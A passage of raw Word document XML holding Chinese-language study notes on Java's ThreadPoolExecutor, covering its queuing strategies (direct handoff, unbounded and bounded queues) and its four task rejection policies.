          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executor </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>始终首选将请求加入队列，而不添加新的线程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF55C6" w:rsidRPr="00DF55C6" w:rsidRDefault="00DF55C6" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果无法将请求加入队列，则创建新的线程，除非创建此线程超出</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，在这种情况下，任务将被拒绝。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF55C6" w:rsidRPr="00DF55C6" w:rsidRDefault="00DF55C6" w:rsidP="00DF55C6">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>排队有三种通用策略：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF55C6" w:rsidRPr="00DF55C6" w:rsidRDefault="00DF55C6" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>直接提交。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>工作队列的默认选项是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId187" w:tooltip="java.util.concurrent 中的类" w:history="1">
        <w:r w:rsidRPr="00DF55C6">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="CA0000"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>SynchronousQueue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，它将任务直接提交给线程而不保持它们。在此，如果不存在可用于立即运行任务的线程，则试图把任务加入队列将失败，因此会构造一个新的线程。此策略可以避免在处理可能具有内部依赖性的请求集时出现锁。直接提交通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>要求无界</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> maximumPoolSizes </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>以避免拒绝新提交的任务。当命令以超过队列所能处理的平均数连续到达时，此策略允许无界线程具有增长的可能性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF55C6" w:rsidRPr="00DF55C6" w:rsidRDefault="00DF55C6" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>无界队列。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用无界队列（例如，不具有预定义容量的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId188" w:tooltip="java.util.concurrent 中的类" w:history="1">
        <w:r w:rsidRPr="00DF55C6">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="CA0000"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>LinkedBlockingQueue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）将导致在所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> corePoolSize </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>线程都忙时新任务在队列中等待。这样，创建的线程就不会超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。（因此，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">maximumPoolSize </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的值也就无效了。）当每个任务完全独立于其他任务，即任务执行互不影响时，适合于使用无界队列；例如，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>页服务器中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00951658">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>这种排队可用于处理瞬态突发请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，当命令以超过队列所能处理的平均数连续到达时，此策略允许无界线程具有增长的可能性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF55C6" w:rsidRPr="00DF55C6" w:rsidRDefault="00DF55C6" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>有界队列。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>当使用有限的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> maximumPoolSizes </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，有界队列（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId189" w:tooltip="java.util.concurrent 中的类" w:history="1">
        <w:r w:rsidRPr="00DF55C6">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="CA0000"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>ArrayBlockingQueue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）有助于防止资源耗尽，但是可能较难调整和控制。队列大小和最大池大小可能需要相互折衷：使用大型队列和小型池可以最大限度地降低</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用率、操作系统资源和上下文切换开销，但是可能导致人工降低吞吐量。如果任务频繁阻塞（例如，如果它们是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>边界），则系统可能为超过您许可的更多线程安排时间。使用小型队列通常要求较大的池大小，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用率较高，但是可能遇到不可接受的调度开销，这样也会降低吞吐量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A180A" w:rsidRPr="00DF55C6" w:rsidRDefault="008A180A" w:rsidP="008A180A"/>
    <w:p w:rsidR="0085077D" w:rsidRDefault="0085077D" w:rsidP="0085077D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>1.3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>线程池</w:t>
      </w:r>
      <w:r w:rsidR="00196F10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>拒绝策略选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00294F3E" w:rsidRDefault="00F94E04" w:rsidP="00294F3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00294F3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仔细看了下</w:t>
      </w:r>
      <w:r w:rsidR="00294F3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CallerRunsPolicy</w:t>
      </w:r>
      <w:r w:rsidR="00294F3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的解释：</w:t>
      </w:r>
      <w:r w:rsidR="00294F3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> A handler for rejected tasks that runs the rejected task directly in the calling thread of the execute method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085077D" w:rsidRDefault="00294F3E" w:rsidP="00294F3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哪个线程调这个任务就在哪个线程里执行，主线程调的，所以主线程停止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环，先来把这个任务做了，然后在循环后面的</w:t>
      </w:r>
      <w:r w:rsidR="00F94E04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0825" w:rsidRDefault="00F94E04" w:rsidP="002D0825">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在默认的</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ThreadPoolExecutor.AbortPolicy </w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，处理程序遭到拒绝将抛出运行时</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RejectedExecutionException</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0825" w:rsidRDefault="00F94E04" w:rsidP="002D0825">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ThreadPoolExecutor.CallerRunsPolicy </w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidR="002D0825" w:rsidRPr="00410390">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>线程调用运行该任务的</w:t>
      </w:r>
      <w:r w:rsidR="002D0825" w:rsidRPr="00410390">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">execute </w:t>
      </w:r>
      <w:r w:rsidR="002D0825" w:rsidRPr="00410390">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>本身</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此策略提供简单的反馈控制机制，能够减缓新任务的提交速度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0825" w:rsidRDefault="00F94E04" w:rsidP="002D0825">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ThreadPoolExecutor.DiscardPolicy </w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，不能执行的任务将被删除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0825" w:rsidRDefault="00F94E04" w:rsidP="002D0825">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ThreadPoolExecutor.DiscardOldestPolicy</w:t>
      </w:r>
      <w:r w:rsidR="002D0825">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，如果执行程序尚未关闭，则位于工作队列头部的任务将被删除，然后重试执行程序（如果再次失败，则重复此过程）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0747E" w:rsidRDefault="00F94E04" w:rsidP="00B0747E">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这四种策略是</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E" w:rsidRPr="00DF55C6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>独立无关的</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，是对任务拒绝处理的四中表现形式。最简单的方式就是直接丢弃任务。但是却有两种方式，到底是该丢弃哪一个任务，比如可以丢弃当前将要加入队列的任务本身（</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DiscardPolicy</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
